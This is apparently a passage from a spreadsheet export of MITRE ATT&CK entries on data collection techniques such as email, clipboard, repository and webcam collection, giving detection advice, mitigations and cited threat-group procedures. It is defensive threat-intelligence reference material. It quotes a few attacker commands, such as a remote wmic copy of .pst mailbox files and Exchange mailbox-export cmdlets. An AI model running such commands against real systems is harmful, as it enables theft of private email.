[LuminousMoth](https://attack.mitre.org/groups/G1014) has manually archived stolen files from victim machines before exfiltration.(Citation: Bitdefender LuminousMoth July 2021)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) encrypted the collected files' path with AES and then encoded them with base64.(Citation: TrendMicro Patchwork Dec 2017)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has encrypted files and information before exfiltration.(Citation: DOJ APT10 Dec 2018)(Citation: District Court of NY APT10 Indictment December 2018)
ADVSTORESHELL
[ADVSTORESHELL](https://attack.mitre.org/software/S0045) encrypts with the 3DES algorithm and a hardcoded key prior to exfiltration.(Citation: ESET Sednit Part 2)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) can encrypt data with 3DES before sending it over to a C2 server.(Citation: Talos Agent Tesla Oct 2018)
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) has compressed collected data before exfiltration.(Citation: KISA Operation Muzabi)
Aria-body
[Aria-body](https://attack.mitre.org/software/S0456) has used ZIP to compress data gathered on a compromised host.(Citation: CheckPoint Naikon May 2020)
BLUELIGHT
[BLUELIGHT](https://attack.mitre.org/software/S0657) can zip files before exfiltration.(Citation: Volexity InkySquid BLUELIGHT August 2021)
Backdoor.Oldrea
[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) writes collected data to a temporary file in an encrypted form before exfiltration to a C2 server.(Citation: Symantec Dragonfly)
BloodHound
[BloodHound](https://attack.mitre.org/software/S0521) can compress data collected by its SharpHound ingestor into a ZIP file to be written to disk.(Citation: GitHub Bloodhound)(Citation: Trend Micro Black Basta October 2022)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) can compress data stolen from the Registry and volume shadow copies prior to exfiltration.(Citation: Cybereason Bumblebee August 2022)
Cadelspy
[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to compress stolen data into a .cab file.(Citation: Symantec Chafer Dec 2015)
Chrommme
[Chrommme](https://attack.mitre.org/software/S0667) can encrypt and store on disk collected data before exfiltration.(Citation: ESET Gelsemium June 2021)
Daserf
[Daserf](https://attack.mitre.org/software/S0187) hides collected data in password-protected .rar archives.(Citation: Symantec Tick Apr 2016)
Dtrack
[Dtrack](https://attack.mitre.org/software/S0567) packs collected data into a password protected archive.(Citation: Securelist Dtrack)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has been observed encrypting the data it collects before sending it to the C2 server. (Citation: Fortinet Emotet May 2017)
Empire
[Empire](https://attack.mitre.org/software/S0363) can ZIP directories on the target system.(Citation: Github PowerShell Empire)
Epic
[Epic](https://attack.mitre.org/software/S0091) encrypts collected data using a public key framework before sending it over the C2 channel.(Citation: Kaspersky Turla) Some variants encrypt the collected data with AES and encode it with base64 before transmitting it to the C2 server.(Citation: Kaspersky Turla Aug 2014)
Exaramel for Windows
[Exaramel for Windows](https://attack.mitre.org/software/S0343) automatically encrypts files before sending them to the C2 server.(Citation: ESET TeleBots Oct 2018) 
FELIXROOT
[FELIXROOT](https://attack.mitre.org/software/S0267) encrypts collected data with AES and Base64 and then sends it to the C2 server.(Citation: FireEye FELIXROOT July 2018)
Gold Dragon
[Gold Dragon](https://attack.mitre.org/software/S0249) encrypts data using Base64 before being sent to the command and control server.(Citation: McAfee Gold Dragon)
KONNI
[KONNI](https://attack.mitre.org/software/S0356) has encrypted data and files prior to exfiltration.(Citation: Malwarebytes Konni Aug 2021)
Kessel
[Kessel](https://attack.mitre.org/software/S0487) can RC4-encrypt credentials before sending to the C2.(Citation: ESET ForSSHe December 2018)	
LightNeuron
[LightNeuron](https://attack.mitre.org/software/S0395) contains a function to encrypt and store emails that it collects.(Citation: ESET LightNeuron May 2019)
Lizar
[Lizar](https://attack.mitre.org/software/S0681) has encrypted data before sending it to the server.(Citation: BiZone Lizar May 2021)
Lurid
[Lurid](https://attack.mitre.org/software/S0010) can compress data before sending it.(Citation: Villeneuve 2011)
Machete
[Machete](https://attack.mitre.org/software/S0409) stores zipped files with profile data from installed web browsers.(Citation: ESET Machete July 2019) 
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) has the ability to compress archived screenshots.(Citation: Red Canary NETWIRE January 2020)
Pillowmint
[Pillowmint](https://attack.mitre.org/software/S0517) has encrypted stolen credit card information with AES and further encoded it with Base64.(Citation: Trustwave Pillowmint June 2020)	
PowerLess
[PowerLess](https://attack.mitre.org/software/S1012) can encrypt browser database files prior to exfiltration.(Citation: Cybereason PowerLess February 2022)
Prikormka
After collecting documents from removable media, [Prikormka](https://attack.mitre.org/software/S0113) compresses the collected files, and encrypts it with Blowfish.(Citation: ESET Operation Groundbait)
Proton
[Proton](https://attack.mitre.org/software/S0279) zips up files before exfiltrating them.(Citation: objsee mac malware 2017)
Remexi
[Remexi](https://attack.mitre.org/software/S0375) encrypts and adds all gathered browser data into files for upload to C2.(Citation: Securelist Remexi Jan 2019)
RunningRAT
[RunningRAT](https://attack.mitre.org/software/S0253) contains code to compress files.(Citation: McAfee Gold Dragon)
ShimRatReporter
[ShimRatReporter](https://attack.mitre.org/software/S0445) used LZ compression to compress initial reconnaissance reports before sending to the C2.(Citation: FOX-IT May 2016 Mofang)	
TAINTEDSCRIBE
[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) has used &lt;code&gt;FileReadZipSend&lt;/code&gt; to compress a file and send to C2.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)
VERMIN
[VERMIN](https://attack.mitre.org/software/S0257) encrypts the collected files using 3-DES.(Citation: Unit 42 VERMIN Jan 2018)
WellMail
[WellMail](https://attack.mitre.org/software/S0515) can archive files on the compromised host.(Citation: CISA WellMail July 2020)
XCSSET
[XCSSET](https://attack.mitre.org/software/S0658) will compress entire &lt;code&gt;~/Desktop&lt;/code&gt; folders excluding all &lt;code&gt;.git&lt;/code&gt; folders, but only if the total data size is under 200MB.(Citation: trendmicro xcsset xcode project 2020)
Zebrocy
[Zebrocy](https://attack.mitre.org/software/S0251)  has used a method similar to RC4 as well as AES for encryption and hexadecimal for encoding data before exfiltration. (Citation: Securelist Sofacy Feb 2018)(Citation: ESET Zebrocy Nov 2018)(Citation: CISA Zebrocy Oct 2020) 
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for third-party application logging, messaging, and/or other artifacts that may leverage information repositories to mine valuable information. Information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
Logon Session Creation
Monitor for newly constructed logon behavior within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) Sharepoint audit logging can also be configured to report when a user shares a resource. (Citation: Sharepoint Sharing Events)The user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
Audit
Consider periodic review of accounts and privileges for critical and sensitive repositories.
User Account Management
Enforce the principle of least-privilege. Consider implementing access control mechanisms that include both authentication and authorization.
User Training
Develop and publish policies that define acceptable information to be stored in repositories.
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) accessed victims' internal knowledge repositories (wikis) to view sensitive corporate information on products, services, and internal business operations.(Citation: CrowdStrike StellarParticle January 2022)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has collected files from various information repositories.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) has collected schemas and user accounts from systems running SQL Server.(Citation: Visa FIN6 Feb 2019)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has accessed victim security and IT environments and Microsoft Teams to mine valuable information.(Citation: CISA AA20-259A Iran-Based Actor September 2020)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has searched a victim's network for organization collaboration channels like MS Teams or Slack to discover further high-privilege account credentials.(Citation: MSTIC DEV-0537 Mar 2022)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has used a custom .NET tool to collect documents from an organization's internal central database.(Citation: ESET ComRAT May 2020)
P.A.S. Webshell
[P.A.S. Webshell](https://attack.mitre.org/software/S0598) has the ability to list and extract data from SQL databases.(Citation: ANSSI Sandworm January 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
In Office365 environments, consider using PurviewAudit to collect MailItemsAccessed events and monitoring for unusual email access behavior.(Citation: Mandiant Cloudy Logs 2023)
Command Execution
Monitor executed commands and arguments for actions that may target an Exchange server, Office 365, or Google Workspace to collect sensitive information.
Logon Session Creation
Monitor for unusual login activity from unknown or abnormal locations, especially for privileged accounts (ex: Exchange administrator account).
Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts. 
Encrypt Sensitive Information
Use of encryption provides an added layer of security to sensitive information sent over email. Encryption using public key cryptography requires the adversary to obtain the private certificate along with an encryption key to decrypt messages.
Multi-factor Authentication
Use of multi-factor authentication for public-facing webmail servers is a recommended best practice to minimize the usefulness of usernames and passwords to adversaries.
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) collected emails from specific individuals, such as executives and IT staff, using `New-MailboxExportRequest` followed by `Get-MailboxExportRequest`.(Citation: Volexity SolarWinds)(Citation: Cybersecurity Advisory SVR TTP May 2021)
APT1
[APT1](https://attack.mitre.org/groups/G0006) uses two utilities, GETMAIL and MAPIGET, to steal email. MAPIGET steals email still on Exchange servers that has not yet been archived.(Citation: Mandiant APT1)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has collected emails from victim Microsoft Exchange servers.(Citation: DOJ GRU Indictment Jul 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has collected emails from targeted mailboxes within a compromised Azure AD tenant and compromised Exchange servers, including via Exchange Web Services (EWS) API requests.(Citation: Mandiant APT29 Microsoft 365 2022)(Citation: Mandiant APT29 Eye Spy Email Nov 22)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has harvested data from remote mailboxes including through execution of &lt;code&gt;\\&lt;hostname&gt;\c$\Users\&lt;username&gt;\AppData\Local\Microsoft\Outlook*.ost&lt;/code&gt;.(Citation: NCC Group Chimera January 2021)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has accessed email accounts using Outlook Web Access.(Citation: US-CERT TA18-074A)
FIN4
[FIN4](https://attack.mitre.org/groups/G0085) has accessed and hijacked online email communications using stolen credentials.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)
HAFNIUM
[HAFNIUM](https://attack.mitre.org/groups/G0125) has used web shells to export mailbox data.(Citation: Microsoft HAFNIUM March 2020)(Citation: Volexity Exchange Marauder March 2021)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) has used compromised credentials and a .NET tool to dump data from Microsoft Exchange mailboxes.(Citation: NCC Group APT15 Alive and Strong)(Citation: Microsoft NICKEL December 2021)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used tools such as the MailFetch mail crawler to collect victim emails (excluding spam) from online services via IMAP.(Citation: KISA Operation Muzabi)
Leafminer
[Leafminer](https://attack.mitre.org/groups/G0077) used a tool called MailSniper to search through the Exchange server mailboxes for keywords.(Citation: Symantec Leafminer July 2018)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has exported emails from compromised Exchange servers including through use of the cmdlet `New-MailboxExportRequest.`(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021)
LightNeuron
[LightNeuron](https://attack.mitre.org/software/S0395) collects Exchange emails matching rules specified in its configuration.(Citation: ESET LightNeuron May 2019)
MailSniper
[MailSniper](https://attack.mitre.org/software/S0413) can be used for searching through email in Exchange and Office 365 environments.(Citation: GitHub MailSniper)
SeaDuke
Some [SeaDuke](https://attack.mitre.org/software/S0053) samples have a module to extract email from Microsoft Exchange servers using compromised credentials.(Citation: Symantec Seaduke 2015)
Valak
[Valak](https://attack.mitre.org/software/S0476) can collect sensitive mailing information from Exchange servers, including credentials and the domain certificate of an enterprise.(Citation: Cybereason Valak May 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments to collect data stored in the clipboard from users copying information within or between applications.
OS API Execution
Monitor API calls that could collect data stored in the clipboard from users copying information within or between applications.
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors collected clipboard data in plaintext.(Citation: FoxIT Wocao December 2019)
APT38
[APT38](https://attack.mitre.org/groups/G0082) used a Trojan called KEYLIME to collect data from the clipboard.(Citation: FireEye APT38 Oct 2018)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has used tools capable of stealing contents of the clipboard.(Citation: Symantec Chafer February 2018)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) can steal data from the victim’s clipboard.(Citation: Talos Agent Tesla Oct 2018)(Citation: Fortinet Agent Tesla April 2018)(Citation: Fortinet Agent Tesla June 2017)(Citation: Bitdefender Agent Tesla April 2020)
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) collects information from the clipboard by using the OpenClipboard() and GetClipboardData() libraries. (Citation: Cybereason Astaroth Feb 2019)
Attor
[Attor](https://attack.mitre.org/software/S0438) has a plugin that collects data stored in the Windows clipboard by using the OpenClipboard and GetClipboardData APIs.(Citation: ESET Attor Oct 2019)
Cadelspy
[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to steal data from the clipboard.(Citation: Symantec Chafer Dec 2015)
Catchamas
[Catchamas](https://attack.mitre.org/software/S0261) steals data stored in the clipboard.(Citation: Symantec Catchamas April 2018)
Clambling
[Clambling](https://attack.mitre.org/software/S0660) has the ability to capture and store clipboard data.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)
CosmicDuke
[CosmicDuke](https://attack.mitre.org/software/S0050) copies and exfiltrates the clipboard contents every 30 seconds.(Citation: F-Secure Cosmicduke)
DarkComet
[DarkComet](https://attack.mitre.org/software/S0334) can steal data from the clipboard.(Citation: Malwarebytes DarkComet March 2018)
DarkTortilla
[DarkTortilla](https://attack.mitre.org/software/S1066) can download a clipboard information stealer module.(Citation: Secureworks DarkTortilla Aug 2022)
Empire
[Empire](https://attack.mitre.org/software/S0363) can harvest clipboard data on both Windows and macOS systems.(Citation: Github PowerShell Empire)
Explosive
[Explosive](https://attack.mitre.org/software/S0569) has a function to use the OpenClipboard wrapper.(Citation: CheckPoint Volatile Cedar March 2015) 
FlawedAmmyy
[FlawedAmmyy](https://attack.mitre.org/software/S0381) can collect clipboard data.(Citation: Korean FSI TA505 2020)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can capture clipboard data from a compromised host.(Citation: IBM Grandoreiro April 2020)
Helminth
The executable version of [Helminth](https://attack.mitre.org/software/S0170) has a module to log clipboard contents.(Citation: Palo Alto OilRig May 2016)
JHUHUGIT
A [JHUHUGIT](https://attack.mitre.org/software/S0044) variant accesses a screenshot saved in the clipboard and converts it to a JPG image.(Citation: Unit 42 Playbook Dec 2017)
KONNI
[KONNI](https://attack.mitre.org/software/S0356) had a feature to steal data from the clipboard.(Citation: Talos Konni May 2017)
Koadic
[Koadic](https://attack.mitre.org/software/S0250) can retrieve the current content of the user clipboard.(Citation: Github Koadic)
MacSpy
[MacSpy](https://attack.mitre.org/software/S0282) can steal clipboard contents.(Citation: objsee mac malware 2017)
Machete
[Machete](https://attack.mitre.org/software/S0409) hijacks the clipboard data by creating an overlapped window that listens to keyboard events.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014) 
MarkiRAT
[MarkiRAT](https://attack.mitre.org/software/S0652) can capture clipboard content.(Citation: Kaspersky Ferocious Kitten Jun 2021)
Melcoz
[Melcoz](https://attack.mitre.org/software/S0530) can monitor content saved to the clipboard.(Citation: Securelist Brazilian Banking Malware July 2020)
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) has a function to hijack data from the clipboard by monitoring the contents of the clipboard and replacing the cryptocurrency wallet with the attacker's.(Citation: Fortinet Metamorfo Feb 2020)(Citation: ESET Casbaneiro Oct 2019)
ROKRAT
[ROKRAT](https://attack.mitre.org/software/S0240) can extract clipboard data from a compromised host.(Citation: Volexity InkySquid RokRAT August 2021)
RTM
[RTM](https://attack.mitre.org/software/S0148) collects data from the clipboard.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)
Remcos
[Remcos](https://attack.mitre.org/software/S0332) steals and modifies data from the clipboard.(Citation: Riskiq Remcos Jan 2018)
Remexi
[Remexi](https://attack.mitre.org/software/S0375) collects text from the clipboard.(Citation: Securelist Remexi Jan 2019)
RunningRAT
[RunningRAT](https://attack.mitre.org/software/S0253) contains code to open and copy data from the clipboard.(Citation: McAfee Gold Dragon)
TajMahal
[TajMahal](https://attack.mitre.org/software/S0467) has the ability to steal data from the clipboard of an infected host.(Citation: Kaspersky TajMahal April 2019)
TinyZBot
[TinyZBot](https://attack.mitre.org/software/S0004) contains functionality to collect information from the clipboard.(Citation: Cylance Cleaver)
VERMIN
[VERMIN](https://attack.mitre.org/software/S0257) collects data stored in the clipboard.(Citation: Unit 42 VERMIN Jan 2018)
Zeus Panda
[Zeus Panda](https://attack.mitre.org/software/S0330) can hook GetClipboardData function to watch for clipboard pastes to collect.(Citation: GDATA Zeus Panda June 2017)
jRAT
[jRAT](https://attack.mitre.org/software/S0283) can capture clipboard data.(Citation: Kaspersky Adwind Feb 2016)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for actions that could be taken to gather local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
File Access
Monitor for unusual processes accessing local email files that may target user email on local systems to collect sensitive information.
Encrypt Sensitive Information
Use of encryption provides an added layer of security to sensitive information sent over email. Encryption using public key cryptography requires the adversary to obtain the private certificate along with an encryption key to decrypt messages.
Night Dragon
During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used RAT malware to exfiltrate email archives.(Citation: McAfee Night Dragon)
APT1
[APT1](https://attack.mitre.org/groups/G0006) uses two utilities, GETMAIL and MAPIGET, to steal email. GETMAIL extracts emails from archived Outlook .pst files.(Citation: Mandiant APT1)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has harvested data from victim's e-mail including through execution of &lt;code&gt;wmic /node:&lt;ip&gt; process call create "cmd /c copy c:\Users\&lt;username&gt;\&lt;path&gt;\backup.pst c:\windows\temp\backup.pst" copy "i:\&lt;path&gt;\&lt;username&gt;\My Documents\&lt;filename&gt;.pst"
copy&lt;/code&gt;.(Citation: NCC Group Chimera January 2021)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has collected .PST archives.(Citation: FireEye APT35 2018)
Carbanak
[Carbanak](https://attack.mitre.org/software/S0030) searches recursively for Outlook personal storage tables (PST) files within user directories and sends them back to the C2 server.(Citation: FireEye CARBANAK June 2017)
CosmicDuke
[CosmicDuke](https://attack.mitre.org/software/S0050) searches for Microsoft Outlook data files with extensions .pst and .ost for collection and exfiltration.(Citation: F-Secure Cosmicduke)
Crimson
[Crimson](https://attack.mitre.org/software/S0115) contains a command to collect and exfiltrate emails from Outlook.(Citation: Proofpoint Operation Transparent Tribe March 2016)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has been observed leveraging a module that scrapes email data from Outlook.(Citation: CIS Emotet Dec 2018)
Empire
[Empire](https://attack.mitre.org/software/S0363) has the ability to collect emails on a target system.(Citation: Github PowerShell Empire)
KGH_SPY
[KGH_SPY](https://attack.mitre.org/software/S0526) can harvest data from mail clients.(Citation: Cybereason Kimsuky November 2020)
Out1
[Out1](https://attack.mitre.org/software/S0594) can parse e-mails on a target machine.(Citation: Trend Micro Muddy Water March 2021)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) can interact with a victim’s Outlook session and look through folders and emails.(Citation: GitHub Pupy)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can target and steal locally stored emails to support thread hijacking phishing campaigns.(Citation: Kroll Qakbot June 2020)
(Citation: Kroll Qakbot June 2020)(Citation: Trend Micro Qakbot December 2020)(Citation: Kaspersky QakBot September 2021)
Smoke Loader
[Smoke Loader](https://attack.mitre.org/software/S0226) searches through Outlook files and directories (e.g., inbox, sent, templates, drafts, archives, etc.).(Citation: Talos Smoke Loader July 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)
Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include X-MS-Exchange-Organization-AutoForwarded set to true, X-MailFwdBy and X-Forwarded-To. The forwardingSMTPAddress parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the X-MS-Exchange-Organization-AutoForwarded header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.
In environments using Exchange, monitor logs for the creation or modification of mail transport rules.  
Command Execution
On Windows systems, monitor for creation of suspicious inbox rules through the use of the `New-InboxRule`, `Set-InboxRule`, `New-TransportRule`, and `Set-TransportRule` PowerShell cmdlets.(Citation: Microsoft BEC Campaign)(Citation: Microsoft Manage Mail Flow Rules 2023)
Audit
Enterprise email solutions have monitoring mechanisms that may include the ability to audit auto-forwarding rules on a regular basis.
In an Exchange environment, Administrators can use `Get-InboxRule` / `Remove-InboxRule` and `Get-TransportRule` / `Remove-TransportRule` to discover and remove potentially malicious auto-fowarding and transport rules.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Microsoft Manage Mail Flow Rules 2023)(Citation: Microsoft Get-InboxRule) In addition to this, a MAPI Editor can be utilized to examine the underlying database structure and discover any modifications/tampering of the properties of auto-forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules)
Disable or Remove Feature or Program
Consider disabling external email forwarding.(Citation: Microsoft BEC Campaign)
Encrypt Sensitive Information
Use of encryption provides an added layer of security to sensitive information sent over email. Encryption using public key cryptography requires the adversary to obtain the private certificate along with an encryption key to decrypt messages.
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has set auto-forward rules on victim's e-mail accounts.(Citation: CISA AA20-301A Kimsuky)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has set an Office 365 tenant level mail transport rule to send all mail in and out of the targeted organization to the newly created account.(Citation: MSTIC DEV-0537 Mar 2022)
Silent Librarian
[Silent Librarian](https://attack.mitre.org/groups/G0122) has set up auto forwarding rules on compromised e-mail accounts.(Citation: DOJ Iran Indictments March 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include &lt;code&gt;X-MS-Exchange-Organization-AutoForwarded&lt;/code&gt; set to true, &lt;code&gt;X-MailFwdBy&lt;/code&gt; and &lt;code&gt;X-Forwarded-To&lt;/code&gt;. The &lt;code&gt;forwardingSMTPAddress&lt;/code&gt; parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the &lt;code&gt;X-MS-Exchange-Organization-AutoForwarded&lt;/code&gt; header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.
Command Execution
Monitor executed processes and command-line arguments for actions that could be taken to gather local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
On Windows systems, monitor for creation of suspicious inbox rules through the use of the `New-InboxRule`, `Set-InboxRule`, `New-TransportRule`, and `Set-TransportRule` PowerShell cmdlets.(Citation: Microsoft BEC Campaign)(Citation: Microsoft Manage Mail Flow Rules 2023)
File Access
Monitor for unusual processes access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.
Logon Session Creation
Monitor for unusual login activity from unknown or abnormal locations, especially for privileged accounts (ex: Exchange administrator account). 
Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts. 
Audit
Enterprise email solutions have monitoring mechanisms that may include the ability to audit auto-forwarding rules on a regular basis.
In an Exchange environment, Administrators can use Get-InboxRule to discover and remove potentially malicious auto-forwarding rules.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) 
Encrypt Sensitive Information
Use of encryption provides an added layer of security to sensitive information sent over email. Encryption using public key cryptography requires the adversary to obtain the private certificate along with an encryption key to decrypt messages.
Multi-factor Authentication
Use of multi-factor authentication for public-facing webmail servers is a recommended best practice to minimize the usefulness of usernames and passwords to adversaries.
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has compromised email credentials in order to steal sensitive data.(Citation: Certfa Charming Kitten January 2021)
Silent Librarian
[Silent Librarian](https://attack.mitre.org/groups/G0122) has exfiltrated entire mailboxes from compromised accounts.(Citation: DOJ Iran Indictments March 2018)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has been observed leveraging a module that can scrape email addresses from Outlook.(Citation: CIS Emotet Dec 2018)(Citation: IBM IcedID November 2017)(Citation: Binary Defense Emotes Wi-Fi Spreader)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information.
OS API Execution
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video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data.
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) created a custom video recording capability that could be used to monitor operations in the victim's environment.(Citation: FireEye FIN7 Aug 2018)(Citation: DOJ FIN7 Aug 2018)
Silence
[Silence](https://attack.mitre.org/groups/G0091) has been observed making videos of victims to observe bank employees day to day activities.(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) can access the victim’s webcam and record video.(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Talos Agent Tesla Oct 2018)
AsyncRAT
[AsyncRAT](https://attack.mitre.org/software/S1087) can record screen content on targeted systems.(Citation: AsyncRAT GitHub)
Bandook
[Bandook](https://attack.mitre.org/software/S0234) has modules that are capable of capturing video from a victim's webcam.(Citation: EFF Manul Aug 2016)
Clambling
[Clambling](https://attack.mitre.org/software/S0660) can record screen content in AVI format.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)
Cobian RAT
[Cobian RAT](https://attack.mitre.org/software/S0338) has a feature to access the webcam on the victim’s machine.(Citation: Zscaler Cobian Aug 2017)
ConnectWise
[ConnectWise](https://attack.mitre.org/software/S0591) can record video on remote hosts.(Citation: Anomali Static Kitten February 2021)
Crimson
[Crimson](https://attack.mitre.org/software/S0115) can capture webcam video on targeted systems.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)
DarkComet
[DarkComet](https://attack.mitre.org/software/S0334) can access the victim’s webcam to take pictures.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)
Derusbi
[Derusbi](https://attack.mitre.org/software/S0021) is capable of capturing video.(Citation: FireEye Periscope March 2018)
Empire
[Empire](https://attack.mitre.org/software/S0363) can capture webcam data on Windows and macOS systems.(Citation: Github PowerShell Empire)
EvilGrab
[EvilGrab](https://attack.mitre.org/software/S0152) has the capability to capture video from a victim machine.(Citation: PWC Cloud Hopper Technical Annex April 2017)
Imminent Monitor
[Imminent Monitor](https://attack.mitre.org/software/S0434) has a remote webcam monitoring capability.(Citation: Imminent Unit42 Dec2019)(Citation: QiAnXin APT-C-36 Feb2019)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can remotely activate the victim’s webcam to capture content.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)
Kazuar
[Kazuar](https://attack.mitre.org/software/S0265) captures images from the webcam.(Citation: Unit 42 Kazuar May 2017)
Machete
[Machete](https://attack.mitre.org/software/S0409) takes photos from the computer’s web camera.(Citation: Securelist Machete Aug 2014)(Citation: Cylance Machete Mar 2017)(Citation: 360 Machete Sep 2020)
NanoCore
